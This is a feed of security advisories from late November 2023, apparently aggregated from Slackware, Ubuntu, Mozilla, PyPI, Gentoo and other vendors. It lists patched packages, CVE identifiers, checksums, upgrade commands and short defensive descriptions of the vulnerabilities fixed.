21.11.2023 23:38:12 | slackware | [SSA:2023-325-02] mozilla-firefox | New mozilla-firefox packages are available for Slackware 15.0 and -current to fix security issues. **Here are the details from the Slackware 15.0 ChangeLog** ```patches/packages/mozilla-firefox-115.5.0esr-i686-1_slack15.0.txz: Upgraded. This update contains security fixes and improvements. Thanks to zuriel for the taskbar icon fix on Wayland. 🙂 For more information, see: https://www.mozilla.org/en-US/firefox/115.5.0/releasenotes/ https://www.mozilla.org/security/advisories/mfsa2023-50/ https://www.cve.org/CVERecord?id=CVE-2023-6204 https://www.cve.org/CVERecord?id=CVE-2023-6205 https://www.cve.org/CVERecord?id=CVE-2023-6206 https://www.cve.org/CVERecord?id=CVE-2023-6207 https://www.cve.org/CVERecord?id=CVE-2023-6208 https://www.cve.org/CVERecord?id=CVE-2023-6209 https://www.cve.org/CVERecord?id=CVE-2023-6212 (* Security fix *)``` **Where to find the new packages** Thanks to the friendly folks at the OSU Open Source Lab (http://osuosl.org) for donating FTP and rsync hosting to the Slackware project! :-) Also see the "Get Slack" section on http://slackware.com for additional mirror sites near you. Updated package for Slackware 15.0: ftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/mozilla-firefox-115.5.0esr-i686-1_slack15.0.txz Updated package for Slackware x86_64 15.0: ftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/mozilla-firefox-115.5.0esr-x86_64-1_slack15.0.txz Updated package for Slackware -current: ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/xap/mozilla-firefox-115.5.0esr-i686-1.txz Updated package for Slackware x86_64 -current: ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/xap/mozilla-firefox-115.5.0esr-x86_64-1.txz **MD5 signatures** Slackware 15.0 package: be656147bc1284ff03177a2f0439034a mozilla-firefox-115.5.0esr-i686-1_slack15.0.txz Slackware x86_64 15.0 package: dbefe1e1e364ec89f9525f9a2159ec4b mozilla-firefox-115.5.0esr-x86_64-1_slack15.0.txz Slackware -current package: aa672a0cd13111a53a2c7b8c391a1d47 xap/mozilla-firefox-115.5.0esr-i686-1.txz Slackware x86_64 -current package: 80111c7f199e7ed618c30e4ef7b98185 xap/mozilla-firefox-115.5.0esr-x86_64-1.txz **Installation instructions** Upgrade the package as root: `# upgradepkg mozilla-firefox-115.5.0esr-i686-1_slack15.0.txz` | https://secdb.nttzen.cloud/security-advisory/detail/SSA:2023-325-02
21.11.2023 23:37:49slackware[SSA:2023-325-01] Slackware 15.0 kernelNew kernel packages are available for Slackware 15.0 to fix security issues.**Here are the details from the Slackware 15.0 ChangeLog**```patches/packages/linux-5.15.139/*: Upgraded. These updates fix various bugs and security issues. Be sure to upgrade your initrd after upgrading the kernel packages. If you use lilo to boot your machine, be sure lilo.conf points to the correct kernel and initrd and run lilo as root to update the bootloader. If you use elilo to boot your machine, you should run eliloconfig to copy the kernel and initrd to the EFI System Partition. For more information, see: Fixed in 5.15.116: https://www.cve.org/CVERecord?id=CVE-2023-35788 https://www.cve.org/CVERecord?id=CVE-2022-45887 https://www.cve.org/CVERecord?id=CVE-2022-45886 https://www.cve.org/CVERecord?id=CVE-2023-3212 https://www.cve.org/CVERecord?id=CVE-2022-45919 Fixed in 5.15.117: https://www.cve.org/CVERecord?id=CVE-2023-2124 https://www.cve.org/CVERecord?id=CVE-2023-34255 Fixed in 5.15.118: https://www.cve.org/CVERecord?id=CVE-2023-3609 https://www.cve.org/CVERecord?id=CVE-2023-3117 https://www.cve.org/CVERecord?id=CVE-2023-3390 https://www.cve.org/CVERecord?id=CVE-2023-3338 Fixed in 5.15.119: https://www.cve.org/CVERecord?id=CVE-2023-3610 Fixed in 5.15.121: https://www.cve.org/CVERecord?id=CVE-2023-31248 https://www.cve.org/CVERecord?id=CVE-2023-38432 https://www.cve.org/CVERecord?id=CVE-2023-3866 https://www.cve.org/CVERecord?id=CVE-2023-2898 https://www.cve.org/CVERecord?id=CVE-2023-44466 https://www.cve.org/CVERecord?id=CVE-2023-4132 https://www.cve.org/CVERecord?id=CVE-2023-3611 https://www.cve.org/CVERecord?id=CVE-2022-48502 https://www.cve.org/CVERecord?id=CVE-2023-3865 https://www.cve.org/CVERecord?id=CVE-2023-35001 https://www.cve.org/CVERecord?id=CVE-2023-3776 https://www.cve.org/CVERecord?id=CVE-2023-3863 Fixed in 5.15.122: https://www.cve.org/CVERecord?id=CVE-2023-20593 Fixed in 5.15.123: https://www.cve.org/CVERecord?id=CVE-2023-3777 https://www.cve.org/CVERecord?id=CVE-2023-4004 Fixed in 5.15.124: https://www.cve.org/CVERecord?id=CVE-2023-4015 https://www.cve.org/CVERecord?id=CVE-2023-4147 https://www.cve.org/CVERecord?id=CVE-2023-1206 Fixed in 5.15.125: https://www.cve.org/CVERecord?id=CVE-2022-40982 https://www.cve.org/CVERecord?id=CVE-2023-20569 Fixed in 5.15.126: https://www.cve.org/CVERecord?id=CVE-2023-20588 https://www.cve.org/CVERecord?id=CVE-2023-4128 https://www.cve.org/CVERecord?id=CVE-2023-4208 https://www.cve.org/CVERecord?id=CVE-2023-4206 https://www.cve.org/CVERecord?id=CVE-2023-4207 https://www.cve.org/CVERecord?id=CVE-2023-40283 Fixed in 5.15.128: https://www.cve.org/CVERecord?id=CVE-2023-4569 https://www.cve.org/CVERecord?id=CVE-2023-39194 https://www.cve.org/CVERecord?id=CVE-2023-4273 https://www.cve.org/CVERecord?id=CVE-2023-3772 Fixed in 5.15.132: https://www.cve.org/CVERecord?id=CVE-2023-4921 https://www.cve.org/CVERecord?id=CVE-2023-4623 https://www.cve.org/CVERecord?id=CVE-2023-42753 https://www.cve.org/CVERecord?id=CVE-2023-42752 https://www.cve.org/CVERecord?id=CVE-2023-39189 https://www.cve.org/CVERecord?id=CVE-2023-4881 https://www.cve.org/CVERecord?id=CVE-2023-45871 https://www.cve.org/CVERecord?id=CVE-2023-39193 https://www.cve.org/CVERecord?id=CVE-2023-39192 Fixed in 5.15.133: https://www.cve.org/CVERecord?id=CVE-2023-42755 Fixed in 5.15.134: https://www.cve.org/CVERecord?id=CVE-2023-42754 https://www.cve.org/CVERecord?id=CVE-2023-4563 https://www.cve.org/CVERecord?id=CVE-2023-4244 https://www.cve.org/CVERecord?id=CVE-2023-5197 Fixed in 5.15.135: https://www.cve.org/CVERecord?id=CVE-2023-34324 https://www.cve.org/CVERecord?id=CVE-2023-31085 https://www.cve.org/CVERecord?id=CVE-2023-5158 Fixed in 5.15.136: https://www.cve.org/CVERecord?id=CVE-2023-35827 Fixed in 5.15.137: https://www.cve.org/CVERecord?id=CVE-2023-46813 https://www.cve.org/CVERecord?id=CVE-2023-5717 https://www.cve.org/CVERecord?id=CVE-2023-5178 (* Security fix *)```**Where to find the new packages**Thanks to the friendly folks at the OSU Open Source Lab (http://osuosl.org) for donating FTP and rsync hosting to the Slackware project! :-) Also see the "Get Slack" section on http://slackware.com for additional mirror sites near you. Updated packages for Slackware 15.0: ftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/linux-5.15.139/kernel-generic-5.15.139-i586-1.txz ftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/linux-5.15.139/kernel-generic-smp-5.15.139_smp-i686-1.txz ftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/linux-5.15.139/kernel-headers-5.15.139_smp-x86-1.txz ftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/linux-5.15.139/kernel-huge-5.15.139-i586-1.txz ftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/linux-5.15.139/kernel-huge-smp-5.15.139_smp-i686-1.txz ftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/linux-5.15.139/kernel-modules-5.15.139-i586-1.txz ftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/linux-5.15.139/kernel-modules-smp-5.15.139_smp-i686-1.txz ftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/linux-5.15.139/kernel-source-5.15.139_smp-noarch-1.txz Updated packages for Slackware x86_64 15.0: ftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/linux-5.15.139/kernel-generic-5.15.139-x86_64-1.txz ftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/linux-5.15.139/kernel-headers-5.15.139-x86-1.txz ftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/linux-5.15.139/kernel-huge-5.15.139-x86_64-1.txz ftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/linux-5.15.139/kernel-modules-5.15.139-x86_64-1.txz ftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/linux-5.15.139/kernel-source-5.15.139-noarch-1.txz**MD5 signatures**Slackware 15.0 packages: 8211588a7ce1578ea991bd5362f7445e kernel-generic-5.15.139-i586-1.txz 64037b5079bfe0757445e074c7d3c7cb kernel-generic-smp-5.15.139_smp-i686-1.txz 1a500cf7afe8e155302ac974aafa44d1 kernel-headers-5.15.139_smp-x86-1.txz ace5996456652d42f14a94c1ba36b4f1 kernel-huge-5.15.139-i586-1.txz 6069f8f4da9f93504af0298735dee9aa kernel-huge-smp-5.15.139_smp-i686-1.txz 984ad76bb952c3931e89210486466668 kernel-modules-5.15.139-i586-1.txz d0dc77021b8169ed7365130bf221e454 kernel-modules-smp-5.15.139_smp-i686-1.txz 96ffc875c55cdecdcf4c52214007d443 kernel-source-5.15.139_smp-noarch-1.txz Slackware x86_64 15.0 packages: c455659e37b122e22a4b53322f6a1795 kernel-generic-5.15.139-x86_64-1.txz 97657fcdbdf707709ba8ff24266ef28d kernel-headers-5.15.139-x86-1.txz b02c2557d92e078e1fdc07eda2ebfcc9 kernel-huge-5.15.139-x86_64-1.txz c97c06949033f62acb3e65b51963e2ea kernel-modules-5.15.139-x86_64-1.txz 711156b762cb7f2b231fe98a831569a4 kernel-source-5.15.139-noarch-1.txz**Installation instructions**Upgrade the packages as root:`# upgradepkg kernel-*.txz` If you are using an initrd, you'll need to rebuild it. For a 32-bit SMP machine, use this command (substitute the appropriate kernel version if you are not running Slackware 15.0):`# /usr/share/mkinitrd/mkinitrd_command_generator.sh -k 5.15.139-smp | bash` For a 64-bit machine, or a 32-bit uniprocessor machine, use this command (substitute the appropriate kernel version if you are not running Slackware 15.0):`# /usr/share/mkinitrd/mkinitrd_command_generator.sh -k 5.15.139 | bash` Please note that "uniprocessor" has to do with the kernel you are running, not with the CPU. Most systems should run the SMP kernel (if they can) regardless of the number of cores the CPU has. If you aren't sure which kernel you are running, run "uname -a". If you see SMP there, you are running the SMP kernel and should use the 5.15.139-smp version when running mkinitrd_command_generator. Note that this is only for 32-bit -- 64-bit systems should always use 5.15.139 as the version. If you are using lilo or elilo to boot the machine, you'll need to ensure that the machine is properly prepared before rebooting. If using LILO: By default, lilo.conf contains an image= line that references a symlink that always points to the correct kernel. No editing should be required unless your machine uses a custom lilo.conf. If that is the case, be sure that the image= line references the correct kernel file. Either way, you'll need to run "lilo" as root to reinstall the boot loader. If using elilo: Ensure that the /boot/vmlinuz symlink is pointing to the kernel you wish to use, and then run eliloconfig to update the EFI System Partition.https://secdb.nttzen.cloud/security-advisory/detail/SSA:2023-325-01
21.11.2023 21:58:21ubuntu[USN-6503-1] Linux kernel vulnerabilitiesSeveral security issues were fixed in the Linux kernel.https://secdb.nttzen.cloud/security-advisory/detail/USN-6503-1
21.11.2023 21:16:50ubuntu[USN-6502-1] Linux kernel vulnerabilitiesSeveral security issues were fixed in the Linux kernel.https://secdb.nttzen.cloud/security-advisory/detail/USN-6502-1
21.11.2023 18:36:15ubuntu[USN-6501-1] RabbitMQ vulnerabilityRabbitMQ could be made to deny service if it received a specially crafted HTTP request.https://secdb.nttzen.cloud/security-advisory/detail/USN-6501-1
21.11.2023 17:42:49ubuntu[USN-6500-1] Squid vulnerabilitiesSeveral security issues were fixed in Squid.https://secdb.nttzen.cloud/security-advisory/detail/USN-6500-1
21.11.2023 17:30:50ubuntu[USN-6495-1] Linux kernel vulnerabilitiesSeveral security issues were fixed in the Linux kernel.https://secdb.nttzen.cloud/security-advisory/detail/USN-6495-1
21.11.2023 17:29:41ubuntu[USN-6499-1] GnuTLS vulnerabilityGnuTLS could be made to expose sensitive information over the network.https://secdb.nttzen.cloud/security-advisory/detail/USN-6499-1
21.11.2023 17:24:30ubuntu[USN-6498-1] FRR vulnerabilitiesSeveral security issues were fixed in FRR.https://secdb.nttzen.cloud/security-advisory/detail/USN-6498-1
21.11.2023 17:23:51ubuntu[USN-6492-1] Mosquitto vulnerabilitiesSeveral security issues were fixed in Mosquitto.https://secdb.nttzen.cloud/security-advisory/detail/USN-6492-1
21.11.2023 17:17:23ubuntu[USN-6497-1] Linux kernel (OEM) vulnerabilitiesSeveral security issues were fixed in the Linux kernel.https://secdb.nttzen.cloud/security-advisory/detail/USN-6497-1
21.11.2023 17:14:21ubuntu[USN-6496-1] Linux kernel vulnerabilitiesSeveral security issues were fixed in the Linux kernel.https://secdb.nttzen.cloud/security-advisory/detail/USN-6496-1
21.11.2023 16:55:08ubuntu[USN-6494-1] Linux kernel vulnerabilitiesSeveral security issues were fixed in the Linux kernel.https://secdb.nttzen.cloud/security-advisory/detail/USN-6494-1
21.11.2023 16:34:43ubuntu[USN-6493-2] hibagent updateA security improvement was added to hibagent.https://secdb.nttzen.cloud/security-advisory/detail/USN-6493-2
21.11.2023 14:59:06ubuntu[USN-6493-1] hibagent updateA security improvement was added to hibagent.https://secdb.nttzen.cloud/security-advisory/detail/USN-6493-1
21.11.2023 11:15:47ubuntu[USN-6491-1] Node.js vulnerabilitiesSeveral security issues were fixed in Node.js.https://secdb.nttzen.cloud/security-advisory/detail/USN-6491-1
21.11.2023 02:00:00mozilla[MFSA-2023-49] Security Vulnerabilities fixed in Firefox 120 (high)- CVE-2023-6204: Out-of-bound memory access in WebGL2 blitFramebuffer (high) On some systems—depending on the graphics settings and drivers—it was possible to force an out-of-bounds read and leak memory data into the images created on the canvas element. - CVE-2023-6205: Use-after-free in MessagePort::Entangled (high) It was possible to cause the use of a MessagePort after it had already been freed, which could potentially have led to an exploitable crash. - CVE-2023-6206: Clickjacking permission prompts using the fullscreen transition (high) The black fade animation when exiting fullscreen is roughly the length of the anti-clickjacking delay on permission prompts. It was possible to use this fact to surprise users by luring them to click where the permission grant button would be about to appear. - CVE-2023-6207: Use-after-free in ReadableByteStreamQueueEntry::Buffer (high) Ownership mismanagement led to a use-after-free in ReadableByteStreams. - CVE-2023-6208: Using Selection API would copy contents into X11 primary selection. (moderate) When using X11, text selected by the page using the Selection API was erroneously copied into the primary selection, a temporary storage not unlike the clipboard. *This bug only affects Firefox on X11. Other systems are unaffected.* - CVE-2023-6209: Incorrect parsing of relative URLs starting with "///" (moderate) Relative URLs starting with three slashes were incorrectly parsed, and a path-traversal "/../" part in the path could be used to override the specified host. This could contribute to security problems in web sites. - CVE-2023-6210: Mixed-content resources not blocked in a javascript: pop-up (low) When an https: web page created a pop-up from a "javascript:" URL, that pop-up was incorrectly allowed to load blockable content such as iframes from insecure http: URLs. - CVE-2023-6211: Clickjacking to load insecure pages in HTTPS-only mode (low) If an attacker needed a user to load an insecure http: page and knew that user had enabled HTTPS-only mode, the attacker could have tricked the user into clicking to grant an HTTPS-only exception if they could get the user to participate in a clicking game. - CVE-2023-6212: Memory safety bugs fixed in Firefox 120, Firefox ESR 115.5, and Thunderbird 115.5 (high) Memory safety bugs present in Firefox 119, Firefox ESR 115.4, and Thunderbird 115.4. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code. - CVE-2023-6213: Memory safety bugs fixed in Firefox 120 (high) Memory safety bugs present in Firefox 119. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code.https://secdb.nttzen.cloud/security-advisory/detail/MFSA-2023-49
21.11.2023 02:00:00mozilla[MFSA-2023-51] Security Vulnerabilities fixed in Firefox for iOS 120 (high)- CVE-2023-49060: Privilege escalation through `<a [referrerpolicy]>` in ReaderMode (high) An attacker could have accessed internal pages or data by exfiltrating a security key from ReaderMode via the `referrerpolicy` attribute. - CVE-2023-49061: HTML injection in %READER-BYLINE% of ReaderMode (moderate) An attacker could have performed HTML template injection via Reader Mode and exfiltrated user information.https://secdb.nttzen.cloud/security-advisory/detail/MFSA-2023-51
21.11.2023 02:00:00mozilla[MFSA-2023-50] Security Vulnerabilities fixed in Firefox ESR 115.5 (high)- CVE-2023-6204: Out-of-bound memory access in WebGL2 blitFramebuffer (high) On some systems—depending on the graphics settings and drivers—it was possible to force an out-of-bounds read and leak memory data into the images created on the canvas element. - CVE-2023-6205: Use-after-free in MessagePort::Entangled (high) It was possible to cause the use of a MessagePort after it had already been freed, which could potentially have led to an exploitable crash. - CVE-2023-6206: Clickjacking permission prompts using the fullscreen transition (high) The black fade animation when exiting fullscreen is roughly the length of the anti-clickjacking delay on permission prompts. It was possible to use this fact to surprise users by luring them to click where the permission grant button would be about to appear. - CVE-2023-6207: Use-after-free in ReadableByteStreamQueueEntry::Buffer (high) Ownership mismanagement led to a use-after-free in ReadableByteStreams. - CVE-2023-6208: Using Selection API would copy contents into X11 primary selection. (moderate) When using X11, text selected by the page using the Selection API was erroneously copied into the primary selection, a temporary storage not unlike the clipboard. *This bug only affects Firefox on X11. Other systems are unaffected.* - CVE-2023-6209: Incorrect parsing of relative URLs starting with "///" (moderate) Relative URLs starting with three slashes were incorrectly parsed, and a path-traversal "/../" part in the path could be used to override the specified host. This could contribute to security problems in web sites. - CVE-2023-6212: Memory safety bugs fixed in Firefox 120, Firefox ESR 115.5, and Thunderbird 115.5 (high) Memory safety bugs present in Firefox 119, Firefox ESR 115.4, and Thunderbird 115.4. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code.https://secdb.nttzen.cloud/security-advisory/detail/MFSA-2023-50
21.11.2023 02:00:00mozilla[MFSA-2023-52] Security Vulnerabilities fixed in Thunderbird 115.5.0 (high)In general, these flaws cannot be exploited through email in the Thunderbird product because scripting is disabled when reading mail, but are potentially risks in browser or browser-like contexts.https://secdb.nttzen.cloud/security-advisory/detail/MFSA-2023-52
22.11.2023 21:38:40slackware[SSA:2023-326-01] mozilla-thunderbirdNew mozilla-thunderbird packages are available for Slackware 15.0 and -current to fix security issues.**Here are the details from the Slackware 15.0 ChangeLog**```patches/packages/mozilla-thunderbird-115.5.0-i686-1_slack15.0.txz: Upgraded. This release contains security fixes and improvements. For more information, see: https://www.mozilla.org/en-US/thunderbird/115.5.0/releasenotes/ https://www.mozilla.org/en-US/security/advisories/mfsa2023-52/ https://www.cve.org/CVERecord?id=CVE-2023-6204 https://www.cve.org/CVERecord?id=CVE-2023-6205 https://www.cve.org/CVERecord?id=CVE-2023-6206 https://www.cve.org/CVERecord?id=CVE-2023-6207 https://www.cve.org/CVERecord?id=CVE-2023-6208 https://www.cve.org/CVERecord?id=CVE-2023-6209 https://www.cve.org/CVERecord?id=CVE-2023-6212 (* Security fix *)```**Where to find the new packages**Thanks to the friendly folks at the OSU Open Source Lab (http://osuosl.org) for donating FTP and rsync hosting to the Slackware project! :-) Also see the "Get Slack" section on http://slackware.com for additional mirror sites near you. Updated package for Slackware 15.0: ftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/mozilla-thunderbird-115.5.0-i686-1_slack15.0.txz Updated package for Slackware x86_64 15.0: ftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/mozilla-thunderbird-115.5.0-x86_64-1_slack15.0.txz Updated package for Slackware -current: ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/xap/mozilla-thunderbird-115.5.0-i686-1.txz Updated package for Slackware x86_64 -current: ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/xap/mozilla-thunderbird-115.5.0-x86_64-1.txz**MD5 signatures**Slackware 15.0 package: 49778e0f1eb283c7648551a2efabdc08 mozilla-thunderbird-115.5.0-i686-1_slack15.0.txz Slackware x86_64 15.0 package: 5f18d28e932f51cc691cc12bea57d752 mozilla-thunderbird-115.5.0-x86_64-1_slack15.0.txz Slackware -current package: 08f1120063ed1d48712c10b2ebf9ce67 xap/mozilla-thunderbird-115.5.0-i686-1.txz Slackware x86_64 -current package: 72e06c95e079435f3376b96cfd38a912 xap/mozilla-thunderbird-115.5.0-x86_64-1.txz**Installation instructions**Upgrade the package as root:`# upgradepkg mozilla-thunderbird-115.5.0-i686-1_slack15.0.txz`https://secdb.nttzen.cloud/security-advisory/detail/SSA:2023-326-01
22.11.2023 18:12:50ubuntu[USN-6507-1] GlusterFS vulnerabilityGlusterFS could be made to crash if it received a specially crafted request.https://secdb.nttzen.cloud/security-advisory/detail/USN-6507-1
22.11.2023 16:55:30ubuntu[USN-6506-1] Apache HTTP Server vulnerabilitiesSeveral security issues were fixed in Apache HTTP Server.https://secdb.nttzen.cloud/security-advisory/detail/USN-6506-1
22.11.2023 16:45:49ubuntu[USN-6505-1] nghttp2 vulnerabilitynghttp2 could be made to consume resources if it received specially crafted network traffic.https://secdb.nttzen.cloud/security-advisory/detail/USN-6505-1
22.11.2023 15:02:32ubuntu[USN-6504-1] tracker-miners vulnerabilityA system hardening measure could be bypassed.https://secdb.nttzen.cloud/security-advisory/detail/USN-6504-1
22.11.2023 13:21:52pypi[PYSEC-2023-244] apache-submarine vulnerabilityApache Software Foundation Apache Submarine has an SQL injection vulnerability when a user logs in. This issue can result in unauthorized login. This issue has now been fixed, and a user must have the correct login to access the workbench. This issue affects Apache Submarine: from 0.7.0 before 0.8.0. We recommend that all Submarine users on 0.7.0 upgrade to 0.8.0, which not only fixes the issue and supports the OIDC authentication mode, but also removes the case of unauthenticated logins. If you are using a version lower than 0.8.0 and do not want to upgrade, you can try cherry-picking the PRs https://github.com/apache/submarine/pull/1037 and https://github.com/apache/submarine/pull/1054 and rebuilding the submarine-server image to fix this.https://secdb.nttzen.cloud/security-advisory/detail/PYSEC-2023-244
22.11.2023 04:43:48pypi[PYSEC-2023-242] httpie vulnerabilityMissing SSL certificate validation in HTTPie v3.2.2 allows attackers to eavesdrop on communications between the host and server via a man-in-the-middle attack.https://secdb.nttzen.cloud/security-advisory/detail/PYSEC-2023-242
22.11.2023 04:43:48pypi[PYSEC-2023-243] localstack vulnerabilityMissing SSL certificate validation in localstack v2.3.2 allows attackers to eavesdrop on communications between the host and server via a man-in-the-middle attack.https://secdb.nttzen.cloud/security-advisory/detail/PYSEC-2023-243
22.11.2023 21:19:42pypi[PYSEC-2023-245] pypinksign vulnerabilityPyPinkSign v0.5.1 uses a non-random or static IV for Cipher Block Chaining (CBC) mode in AES encryption. This vulnerability can lead to the disclosure of information and communications.https://secdb.nttzen.cloud/security-advisory/detail/PYSEC-2023-245
23.11.2023 01:23:57pypi[PYSEC-2023-246] aiohttp vulnerabilityaiohttp is an asynchronous HTTP client/server framework for asyncio and Python. The HTTP parser in AIOHTTP has numerous problems with header parsing, which could lead to request smuggling. This parser is only used when AIOHTTP_NO_EXTENSIONS is enabled (or not using a prebuilt wheel). These bugs have been addressed in commit `d5c12ba89` which has been included in release version 3.8.6. Users are advised to upgrade. There are no known workarounds for these issues.https://secdb.nttzen.cloud/security-advisory/detail/PYSEC-2023-246
23.11.2023 01:23:57pypi[PYSEC-2023-247] aiohttp vulnerabilityaiohttp is an asynchronous HTTP client/server framework for asyncio and Python. Affected versions of aiohttp have a security vulnerability regarding the inconsistent interpretation of the HTTP protocol. HTTP/1.1 is a persistent protocol; if both Content-Length (CL) and Transfer-Encoding (TE) header values are present, it can lead to incorrect interpretation by the two entities that parse the HTTP, and we can poison other sockets with this incorrect interpretation. A possible Proof-of-Concept (POC) would be a configuration with a reverse proxy (frontend) that accepts both CL and TE headers and aiohttp as backend. As aiohttp parses anything with chunked, we can pass a chunked123 as TE; the frontend entity will ignore this header and will parse Content-Length. The impact of this vulnerability is that it is possible to bypass any proxy rule, poisoning sockets to other users, such as by passing Authentication Headers; also, if an Open Redirect is present, an attacker could combine it to redirect random users to another website and log the request. This vulnerability has been addressed in release 3.8.0 of aiohttp. Users are advised to upgrade. There are no known workarounds for this vulnerability.https://secdb.nttzen.cloud/security-advisory/detail/PYSEC-2023-247
22.11.2023 10:00:00msrc[MS:CVE-2023-36025] Windows SmartScreen Security Feature Bypass Vulnerability (important)https://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-36025
23.11.2023 23:29:47ubuntu[USN-6513-1] Python vulnerabilitiesSeveral security issues were fixed in Python.https://secdb.nttzen.cloud/security-advisory/detail/USN-6513-1
23.11.2023 23:06:23ubuntu[USN-6512-1] LibTIFF vulnerabilitiesSeveral security issues were fixed in LibTIFF.https://secdb.nttzen.cloud/security-advisory/detail/USN-6512-1
23.11.2023 15:50:30ubuntu[USN-6511-1] OpenZFS vulnerabilityOpenZFS could allow unintended access to network services.https://secdb.nttzen.cloud/security-advisory/detail/USN-6511-1
23.11.2023 12:32:24ubuntu[USN-6510-1] Apache HTTP Server vulnerabilityApache HTTP Server could be made to crash if it received a specially crafted request.https://secdb.nttzen.cloud/security-advisory/detail/USN-6510-1
23.11.2023 07:39:06ubuntu[USN-6509-1] Firefox vulnerabilitiesSeveral security issues were fixed in Firefox.https://secdb.nttzen.cloud/security-advisory/detail/USN-6509-1
23.11.2023 04:47:28ubuntu[USN-6508-1] poppler vulnerabilitiesSeveral security issues were fixed in poppler.https://secdb.nttzen.cloud/security-advisory/detail/USN-6508-1
23.11.2023 10:38:27almalinux[ALSA-2023:7465] squid security update (important)squid security updatehttps://secdb.nttzen.cloud/security-advisory/detail/ALSA-2023:7465
24.11.2023 22:58:39slackware[SSA:2023-328-01] vimNew vim packages are available for Slackware 15.0 and -current to fix security issues.**Here are the details from the Slackware 15.0 ChangeLog**```patches/packages/vim-9.0.2127-i586-1_slack15.0.txz: Upgraded. Fixed security issues. Thanks to marav for the heads-up. For more information, see: https://www.cve.org/CVERecord?id=CVE-2023-48231 https://www.cve.org/CVERecord?id=CVE-2023-48232 https://www.cve.org/CVERecord?id=CVE-2023-48233 https://www.cve.org/CVERecord?id=CVE-2023-48234 https://www.cve.org/CVERecord?id=CVE-2023-48235 https://www.cve.org/CVERecord?id=CVE-2023-48236 https://www.cve.org/CVERecord?id=CVE-2023-48237 (* Security fix *) patches/packages/vim-gvim-9.0.2127-i586-1_slack15.0.txz: Upgraded.```**Where to find the new packages**Thanks to the friendly folks at the OSU Open Source Lab (http://osuosl.org) for donating FTP and rsync hosting to the Slackware project! :-) Also see the "Get Slack" section on http://slackware.com for additional mirror sites near you. Updated packages for Slackware 15.0: ftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/vim-9.0.2127-i586-1_slack15.0.txz ftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/vim-gvim-9.0.2127-i586-1_slack15.0.txz Updated packages for Slackware x86_64 15.0: ftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/vim-9.0.2127-x86_64-1_slack15.0.txz ftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/vim-gvim-9.0.2127-x86_64-1_slack15.0.txz Updated packages for Slackware -current: ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/ap/vim-9.0.2127-i586-1.txz ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/xap/vim-gvim-9.0.2127-i586-1.txz Updated packages for Slackware x86_64 -current: ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/ap/vim-9.0.2127-x86_64-1.txz ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/xap/vim-gvim-9.0.2127-x86_64-1.txz**MD5 signatures**Slackware 15.0 packages: c0072756362f34fa5fc1121d49481d48 vim-9.0.2127-i586-1_slack15.0.txz c8fc94e220e7d1f88962b52a0a378d83 vim-gvim-9.0.2127-i586-1_slack15.0.txz Slackware x86_64 15.0 packages: 3b8a942d068343c6d8c0df5057bf6aee vim-9.0.2127-x86_64-1_slack15.0.txz e8463e28282a9d3dd47888071db2f027 vim-gvim-9.0.2127-x86_64-1_slack15.0.txz Slackware -current packages: a7f26ee78d9ef0d72b543eb695f22aea ap/vim-9.0.2127-i586-1.txz 01b7e7b14e4c81d6f20865d9fce48670 xap/vim-gvim-9.0.2127-i586-1.txz Slackware x86_64 -current packages: 3fd98cb7c623b08451d9d582560994c8 ap/vim-9.0.2127-x86_64-1.txz d5512b67b25af76d003359e69e39b6c3 xap/vim-gvim-9.0.2127-x86_64-1.txz**Installation instructions**Upgrade the packages as root:`# upgradepkg vim-9.0.2127-i586-1_slack15.0.txz vim-gvim-9.0.2127-i586-1_slack15.0.txz`https://secdb.nttzen.cloud/security-advisory/detail/SSA:2023-328-01
24.11.2023 02:00:00gentoo[GLSA-202311-03] SQLite: Multiple Vulnerabilities (high)Multiple vulnerabilities have been discovered in SQLite, the worst of which may lead to code execution.https://secdb.nttzen.cloud/security-advisory/detail/GLSA-202311-03
24.11.2023 02:00:00gentoo[GLSA-202311-04] Zeppelin: Multiple Vulnerabilities (high)Multiple vulnerabilities have been discovered in Zeppelin, the worst of which could lead to remote code execution.https://secdb.nttzen.cloud/security-advisory/detail/GLSA-202311-04
24.11.2023 02:00:00gentoo[GLSA-202311-05] LinuxCIFS utils: Multiple Vulnerabilities (high)Multiple vulnerabilities have been discovered in LinuxCIFS utils, the worst of which can lead to local root privilege escalation.https://secdb.nttzen.cloud/security-advisory/detail/GLSA-202311-05
24.11.2023 13:49:36pypi[PYSEC-2023-243] localstack vulnerabilityMissing SSL certificate validation in localstack v2.3.2 allows attackers to eavesdrop on communications between the host and server via a man-in-the-middle attack.https://secdb.nttzen.cloud/security-advisory/detail/PYSEC-2023-243
